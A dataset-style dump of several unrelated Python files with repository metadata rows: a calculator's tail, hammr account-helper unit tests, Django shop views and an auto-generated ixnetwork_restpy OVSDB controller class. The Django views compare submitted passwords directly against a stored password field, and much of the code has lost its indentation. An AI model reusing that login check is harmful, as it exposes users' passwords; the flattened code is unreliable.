if variable in self.variables:
                return Status.ok, str((-1) * self.variables[variable])
return self.unknown_variable
return Status.ok, item
def convert_digit_to_int(self, item):
try:
number = int(item)
return Status.ok, number
except ValueError:
if self.is_sign(item):
return Status.ok, None
return self.invalid_assignment
def add_numbers_to_list(self, split_expression):
numbers = []
status, value = Status.ok, numbers
for item in split_expression:
status, value = self.get_variable_value(item)
if status == Status.ok:
status, value = self.convert_digit_to_int(value)
if status is Status.ok and value is not None:
numbers.append(value)
if status == Status.ok:
value = numbers
return status, value
def execute_calculation_expression_parentheses(self, split_expression):
status, numbers = self.add_numbers_to_list(split_expression)
multiply = "*"
division = "/"
signs = [x for x in split_expression if split_expression.index(x) % 2 == 1]
while len(signs) > 0:
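            # Multiplication and division are applied first; the remaining '+'/'-' runs are then folded left to right
            # (an odd number of '-' signs subtracts, an even number adds).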
if multiply in signs:
index = signs.index(multiply)
numbers[index] = self.multiply(numbers[index], numbers[index + 1])
numbers.pop(index + 1)
signs.pop(index)
elif division in signs:
index = signs.index(division)
status, value = self.divide(numbers[index], numbers[index + 1])
numbers[index] = value
numbers.pop(index + 1)
signs.pop(index)
else:
for item in signs:
index = signs.index(item)
if self.minus in item:
if signs[index].count(self.minus) % 2 == 1:
numbers[index] = self.substract(numbers[index], numbers[index + 1])
else:
numbers[index] = self.add(numbers[index], numbers[index + 1])
numbers.pop(index + 1)
signs.pop(index)
number = numbers.pop()
return Status.ok, number
def read_input_data(self, input_str):
self.clear()
self.string = input_str.strip()
if self.is_empty():
return Status.is_empty, None
if self.is_command():
return self.execute_command()
if self.is_assignment_expression():
return self.execute_assignment_expression()
return self.execute_calculation_expression()
def main():
calculator = Calculator()
while not calculator.is_exit():
expression = input()
result = calculator.read_input_data(expression)
if result[0] == Status.exit:
print(result[1])
break
else:
if result[1] is not None:
print(result[1])
continue
main()
| [
"miratava@gmail.com"
] | miratava@gmail.com |
8af6d5e7f52ec995ce57a35bb38b8a4f8c621afa | b1771152725ddf5d568c6f31ec1d264d4d31c571 | /tests/unit/utils/test_account_utils.py | 7da58fd5334132911b59826dbc417677e90fab3c | [
"Apache-2.0"
] | permissive | Numerinico/hammr | d48232e4ac06babba40fa65cda827e22a77c8b7f | 08587fe74f7021e48c50cedaac9b11f0aefc81d8 | refs/heads/master | 2021-08-22T13:38:44.336425 | 2017-09-26T12:38:02 | 2017-09-26T12:38:02 | 104,996,640 | 0 | 0 | null | 2017-09-27T09:03:55 | 2017-09-27T09:03:55 | null | UTF-8 | Python | false | false | 4,238 | py | # Copyright 2007-2017 UShareSoft SAS, All rights reserved
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import TestCase
from hammr.utils.account_utils import *
class TestK5(TestCase):
def test_k5_should_return_cred_account_when_valid_entries(self):
# given
account_given = self.build_account("testName", "testLogin", "testPassword")
# when
account = k5(account_given)
# then
self.assertEqual(account.name, account_given["name"])
self.assertEqual(account.login, account_given["login"])
self.assertEqual(account.password, account_given["password"])
def test_k5_should_return_none_when_missing_name(self):
# given
account_given = self.build_account(None, "testLogin", "testPassword")
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def test_k5_should_return_none_when_missing_login(self):
# given
account_given = self.build_account("testName", None, "testPassword")
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def test_k5_should_return_none_when_missing_password(self):
# given
account_given = self.build_account("testName", "testLogin", None)
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def build_account(self, name, login, password):
account = {}
if name is not None: account["name"] = name
if login is not None: account["login"] = login
if password is not None: account["password"] = password
return account
class TestDocker(TestCase):
def test_docker_should_return_cred_account_when_valid_entries(self):
# given
account_given = self.build_account("testName", "testUrl", "testLogin", "testPassword")
# when
account = docker(account_given)
# then
self.assertEqual(account.name, account_given["name"])
self.assertEqual(account.endpointUrl, account_given["endpointUrl"])
self.assertEqual(account.login, account_given["login"])
self.assertEqual(account.password, account_given["password"])
def test_docker_should_return_none_when_missing_name(self):
# given
accountMocked = self.build_account(None, "testUrl", "testLogin", "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_url(self):
# given
accountMocked = self.build_account("testName", None, "testLogin", "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_login(self):
# given
accountMocked = self.build_account("testName", "testUrl", None, "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_password(self):
# given
accountMocked = self.build_account("testName", "testUrl", "testLogin", None)
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def build_account(self, name, endpoint_url, login, password):
account = {}
if name is not None: account["name"] = name
if endpoint_url is not None: account["endpointUrl"] = endpoint_url
if login is not None: account["login"] = login
if password is not None: account["password"] = password
return account
| [
"ludovic.queiroga@usharesoft.com"
] | ludovic.queiroga@usharesoft.com |
9757249d899825c9dc56cd33cb82d62e434802c6 | bfaf1e27843882a20a691c304682dc43243642ce | /main_app/post_details/views.py | d95177d51d26b36ae51972a17d655c95bc7abbc9 | [] | no_license | hemel18681/Django_Used_Product_Online_Shop | 9e1c836895a5c3e1867519eb851f56287d74ab49 | a2217e83a991132473aabd549f2ff507946f1005 | refs/heads/master | 2023-04-07T22:29:18.223071 | 2021-04-20T18:08:51 | 2021-04-20T18:08:51 | 343,550,273 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,681 | py | from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth import authenticate,login,logout
from django.contrib.auth.models import User
from django.contrib import messages
from authenticate.models import user_info
from post_details.models import pending_post, running_post
from django.contrib.auth.hashers import make_password
from django.core.mail import send_mail
from main_app.settings import EMAIL_HOST_USER
from django.core.files.storage import FileSystemStorage
from django.core.files.base import ContentFile
from PIL import Image
from .forms import make_post_form
def check_post(request):
user_name = request.session['user_name']
author = user_info.objects.filter(user_name=user_name)
details = author.values()
phone_number = details[0]['user_phone_number']
set_size = pending_post.objects.filter(user_phone_number=phone_number)
        if set_size.count() == 0:
if request.method=='POST':
form = make_post_form(request.POST, request.FILES)
            if form.is_valid():
print(request.POST['user_phone_number'])
if user_info.objects.filter(user_name=user_name, user_password = request.POST['user_password']).exists():
form.save()
return redirect('home_page')
else:
messages.error(request,'username or password is wrong')
form = make_post_form()
context = {
'form': form,
}
return render(request,'post_manage/make_post.html',context)
else:
form = make_post_form()
context = {
'form': form,
}
return render(request,'post_manage/make_post.html',context)
else:
return render(request,'post_manage/wait_post.html')
def syncronize_post(request):
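    # Promote every accepted pending post to the running_post table, delete the pending copy, then render the home page.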
all_accept = pending_post.objects.filter(post_accept=True).all()
for star in all_accept.iterator():
saverecord = running_post()
saverecord.user_phone_number = star.user_phone_number
saverecord.post_title = star.post_title
saverecord.post_description = star.post_description
saverecord.post_picture = star.post_picture
saverecord.post_money = star.post_money
saverecord.post_used_days = star.post_used_days
saverecord.done_post = False
saverecord.post_given_date = star.post_given_date
saverecord.save()
pending_post.objects.filter(id=star.id).delete()
all_post = running_post.objects.all()
context = {
'all_post':all_post,
}
return render(request,'index.html',context)
def update_post(request,post_id):
id = post_id
if request.method=='POST':
form = make_post_form(request.POST, request.FILES,instance=running_post.objects.filter(id=id).first())
if form.is_valid():
user_phone_number = request.POST['user_phone_number']
if user_info.objects.filter(user_phone_number=user_phone_number, user_password = request.POST['user_password']).exists():
form.save()
messages.success(request,"Updated.")
else:
messages.success(request,"Username or Password maybe incorrect.")
else:
form = make_post_form(instance=running_post.objects.filter(id=id).first())
form = make_post_form(instance=running_post.objects.filter(id=id).first())
context = {
'form': form,
}
return render(request,'update_post.html',context) | [
"hemel18103112@gmail.com"
] | hemel18103112@gmail.com |
823d1a2718699ef51208e2f707d1e8d3994fa6a8 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ovsdbcontroller_789ff2911c009a5ce719da4041ccbf73.py | f77a1ef26f1ad4fed45de942f83349bbf533fa7d | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,934 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ovsdbcontroller(Base):
"""
The Ovsdbcontroller class encapsulates a list of ovsdbcontroller resources that are managed by the user.
A list of resources can be retrieved from the server using the Ovsdbcontroller.find() method.
The list can be managed by using the Ovsdbcontroller.add() and Ovsdbcontroller.remove() methods.
"""
__slots__ = ()
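    # Illustrative usage sketch (not part of the generated SDM code): it assumes an
    # established ixnetwork_restpy session in which `parent` is the NGPF container
    # object that exposes this class; the names and attribute values are invented.
    #
    #   ovsdb = parent.Ovsdbcontroller.add(Name='ovsdb-ctrl-1', Multiplier=1)
    #   ovsdb = parent.Ovsdbcontroller.find(Name='^ovsdb-ctrl-1$')
    #   for controller in ovsdb:
    #       print(controller.Name, controller.Status)
    #   ovsdb.remove()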
_SDM_NAME = 'ovsdbcontroller'
_SDM_ATT_MAP = {
'ClearDumpDbFiles': 'clearDumpDbFiles',
'ConnectedVia': 'connectedVia',
'ConnectionType': 'connectionType',
'ControllerTcpPort': 'controllerTcpPort',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DirectoryName': 'directoryName',
'DumpdbDirectoryName': 'dumpdbDirectoryName',
'EnableLogging': 'enableLogging',
'EnableOvsdbServerIp': 'enableOvsdbServerIp',
'ErrorCode': 'errorCode',
'ErrorDesc': 'errorDesc',
'ErrorLogDirectoryName': 'errorLogDirectoryName',
'ErrorLogicalSwitchName': 'errorLogicalSwitchName',
'ErrorPhysicalSwitchName': 'errorPhysicalSwitchName',
'ErrorTimeStamp': 'errorTimeStamp',
'Errors': 'errors',
'FileCaCertificate': 'fileCaCertificate',
'FileCertificate': 'fileCertificate',
'FileHWGatewayCertificate': 'fileHWGatewayCertificate',
'FilePrivKey': 'filePrivKey',
'HSCConfiguration': 'hSCConfiguration',
'LatestDumpDbFileNames': 'latestDumpDbFileNames',
'LatestErrorFileNames': 'latestErrorFileNames',
'Multiplier': 'multiplier',
'Name': 'name',
'OvsdbSchema': 'ovsdbSchema',
'OvsdbServerIp': 'ovsdbServerIp',
'PseudoConnectedTo': 'pseudoConnectedTo',
'PseudoConnectedToBfd': 'pseudoConnectedToBfd',
'PseudoConnectedToVxlanReplicator': 'pseudoConnectedToVxlanReplicator',
'PseudoMultiplier': 'pseudoMultiplier',
'PseudoMultiplierBfd': 'pseudoMultiplierBfd',
'PseudoMultiplierVxlanReplicator': 'pseudoMultiplierVxlanReplicator',
'Role': 'role',
'ServerAddDeleteConnectionError': 'serverAddDeleteConnectionError',
'ServerAddDeleteStatus': 'serverAddDeleteStatus',
'ServerConnectionIp': 'serverConnectionIp',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TableNames': 'tableNames',
'TimeOut': 'timeOut',
'VerifyHWGatewayCertificate': 'verifyHWGatewayCertificate',
'VerifyPeerCertificate': 'verifyPeerCertificate',
'Vxlan': 'vxlan',
'VxlanReplicator': 'vxlanReplicator',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(Ovsdbcontroller, self).__init__(parent, list_op)
@property
def ClusterData(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337.ClusterData): An instance of the ClusterData class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337 import ClusterData
if self._properties.get('ClusterData', None) is not None:
return self._properties.get('ClusterData')
else:
return ClusterData(self)._select()
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def ClearDumpDbFiles(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ClearDumpDbFiles']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def ConnectionType(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Connection should use TCP or TLS
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ConnectionType']))
@property
def ControllerTcpPort(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Specify the TCP port for the Controller
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ControllerTcpPort']))
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the Certificate and Key Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DirectoryName']))
@property
def DumpdbDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the DumpDb Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DumpdbDirectoryName']))
@property
def EnableLogging(self):
# type: () -> bool
"""
Returns
-------
        - bool: If true, Port debug logs will be recorded; maximum recording will be up to 500 MB.
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableLogging'])
@EnableLogging.setter
def EnableLogging(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['EnableLogging'], value)
@property
def EnableOvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableOvsdbServerIp']))
@property
def ErrorCode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error Code
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorCode']))
@property
def ErrorDesc(self):
# type: () -> 'Multivalue'
"""
Returns
-------
        - obj(ixnetwork_restpy.multivalue.Multivalue): Description of the error that occurred
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorDesc']))
@property
def ErrorLogDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the ErrorLog Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogDirectoryName']))
@property
def ErrorLogicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
        - obj(ixnetwork_restpy.multivalue.Multivalue): Error occurred for this Logical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogicalSwitchName']))
@property
def ErrorPhysicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
        - obj(ixnetwork_restpy.multivalue.Multivalue): Error occurred for this Physical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorPhysicalSwitchName']))
@property
def ErrorTimeStamp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Time Stamp at which Last Error occurred
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorTimeStamp']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def FileCaCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): CA Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCaCertificate']))
@property
def FileCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCertificate']))
@property
def FileHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): HW Gateway Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileHWGatewayCertificate']))
@property
def FilePrivKey(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Private Key File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FilePrivKey']))
@property
def HSCConfiguration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Each VTEP has its own Hardware Switch Controller.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HSCConfiguration']))
@property
def LatestDumpDbFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest DumpDb Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'])
@LatestDumpDbFileNames.setter
def LatestDumpDbFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'], value)
@property
def LatestErrorFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest Error Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'])
@LatestErrorFileNames.setter
def LatestErrorFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'], value)
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def OvsdbSchema(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Database schema
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbSchema']))
@property
def OvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbServerIp']))
@property
def PseudoConnectedTo(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'])
@PseudoConnectedTo.setter
def PseudoConnectedTo(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'], value)
@property
def PseudoConnectedToBfd(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'])
@PseudoConnectedToBfd.setter
def PseudoConnectedToBfd(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'], value)
@property
def PseudoConnectedToVxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'])
@PseudoConnectedToVxlanReplicator.setter
def PseudoConnectedToVxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'], value)
@property
def PseudoMultiplier(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplier'])
@property
def PseudoMultiplierBfd(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierBfd'])
@property
def PseudoMultiplierVxlanReplicator(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierVxlanReplicator'])
@property
def Role(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[master | none | slave]): The role of the OVSDB Controller.
"""
return self._get_attribute(self._SDM_ATT_MAP['Role'])
@property
def ServerAddDeleteConnectionError(self):
# type: () -> str
"""
Returns
-------
        - str: API to retrieve error occurred while Adding/Deleting Server
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'])
@ServerAddDeleteConnectionError.setter
def ServerAddDeleteConnectionError(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'], value)
@property
def ServerAddDeleteStatus(self):
# type: () -> str
"""
Returns
-------
- str: Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteStatus'])
@property
def ServerConnectionIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server which needs to be Added/Deleted.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ServerConnectionIp']))
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
        - list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def TableNames(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TableNames']))
@property
def TimeOut(self):
# type: () -> int
"""
Returns
-------
- number: Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
"""
return self._get_attribute(self._SDM_ATT_MAP['TimeOut'])
@TimeOut.setter
def TimeOut(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['TimeOut'], value)
@property
def VerifyHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify HW Gateway Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyHWGatewayCertificate']))
@property
def VerifyPeerCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify Peer Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyPeerCertificate']))
@property
def Vxlan(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['Vxlan'])
@Vxlan.setter
def Vxlan(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Vxlan'], value)
@property
def VxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['VxlanReplicator'])
@VxlanReplicator.setter
def VxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['VxlanReplicator'], value)
def update(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Updates ovsdbcontroller resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
        - EnableLogging (bool): If true, Port debug logs will be recorded; maximum recording will be up to 500 MB.
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
        - ServerAddDeleteConnectionError (str): API to retrieve error occurred while Adding/Deleting Server
